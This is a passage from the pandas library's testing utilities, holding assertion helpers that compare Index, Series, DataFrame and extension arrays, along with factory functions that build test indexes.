check_exact: bool = True,
check_categorical: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string",):
assert r.inferred_type in ("string",)
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(
lc, rc, obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare numbers exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
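# Illustrative usage sketch (not part of the original module): the default tolerances accept
# tiny float differences, while check_exact=True does not.
# >>> import pandas as pd
# >>> s1 = pd.Series([0.1, 0.2, 0.3], name="x")
# >>> s2 = pd.Series([0.1, 0.2, 0.300000001], name="x")
# >>> assert_series_equal(s1, s2)                    # passes, within rtol=1e-5
# >>> assert_series_equal(s1, s2, check_exact=True)  # raises AssertionError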
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare numbers exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - the same labels must correspond to the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
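# Illustrative dispatch sketch (not part of the original module):
# >>> import numpy as np
# >>> import pandas as pd
# >>> assert_equal(pd.Index([1, 2, 3]), pd.Index([1, 2, 3]))    # -> assert_index_equal
# >>> assert_equal(np.array([1, 2, 3]), np.array([1, 2, 3]))    # -> assert_numpy_array_equal
# >>> assert_equal("a", "a")                                     # plain equality for strings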
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
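# Illustrative usage sketch (not part of the original module): the same expected values wrapped
# in different boxes.
# >>> import numpy as np
# >>> import pandas as pd
# >>> data = [1, 2, 3]
# >>> box_expected(data, pd.Series)     # Series([1, 2, 3])
# >>> box_expected(data, pd.DataFrame)  # single-row DataFrame (because transpose=True)
# >>> box_expected(data, np.ndarray)    # array([1, 2, 3])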
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Indexes match; nothing further to check here
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
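# Illustrative usage sketch (not part of the original module):
# >>> import pandas as pd
# >>> left = pd.arrays.SparseArray([0, 0, 1, 2])
# >>> right = pd.arrays.SparseArray([0, 0, 1, 2])
# >>> assert_sp_array_equal(left, right)  # same sp_values, sp_index, fill_value and dtype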
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
